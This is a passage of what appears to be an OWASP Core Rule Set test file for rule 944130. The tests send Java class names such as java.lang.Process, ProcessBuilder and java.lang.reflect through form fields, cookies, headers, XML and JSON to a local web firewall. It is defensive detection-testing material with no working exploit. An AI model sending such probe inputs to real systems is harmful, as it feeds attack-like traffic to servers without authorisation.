"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-283 + desc: "Nested XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-284 + desc: "Content-Type text/plain includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-285 + desc: "Content-Type application/json arg value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-286 + desc: "Content-Type application/json arg name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-287 + desc: "Argument test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-288 + desc: "Argument name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-289 + desc: "Cookie test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-290 + desc: "Cookie name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-291 + desc: "Request header test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-292 + desc: "XML attribute value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-293 + desc: "XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-294 + desc: "Nested XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-295 + desc: "Content-Type text/plain includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-296 + desc: "Content-Type application/json arg value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-297 + desc: "Content-Type application/json arg name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-298 + desc: "Argument test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-299 + desc: "Argument name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-300 + desc: "Cookie test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-301 + desc: "Cookie name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-302 + desc: "Request header test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-303 + desc: "XML attribute value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-304 + desc: "XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-305 + desc: "Nested XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-306 + desc: "Content-Type text/plain includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-307 + desc: "Content-Type application/json arg value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-308 + desc: "Content-Type application/json arg name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-309 + desc: "Argument test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-310 + desc: "Argument name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-311 + desc: "Cookie test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-312 + desc: "Cookie name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-313 + desc: "Request header test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-314 + desc: "XML attribute value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-315 + desc: "XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-316 + desc: "Nested XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-317 + desc: "Content-Type text/plain includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-318 + desc: "Content-Type application/json arg value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-319 + desc: "Content-Type application/json arg name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-320 + desc: "Argument test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-321 + desc: "Argument name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-322 + desc: "Cookie test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-323 + desc: "Cookie name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-324 + desc: "Request header test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-325 + desc: "XML attribute value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-326 + desc: "XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-327 + desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-328 + desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-329 + desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-330 + desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-331 + desc: "Argument test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-332 + desc: "Argument name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-333 + desc: "Cookie test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-334 + desc: "Cookie name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-335 + desc: "Request header test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-336 + desc: "XML attribute value includes keyword java.lang.reflect" + stages: + - 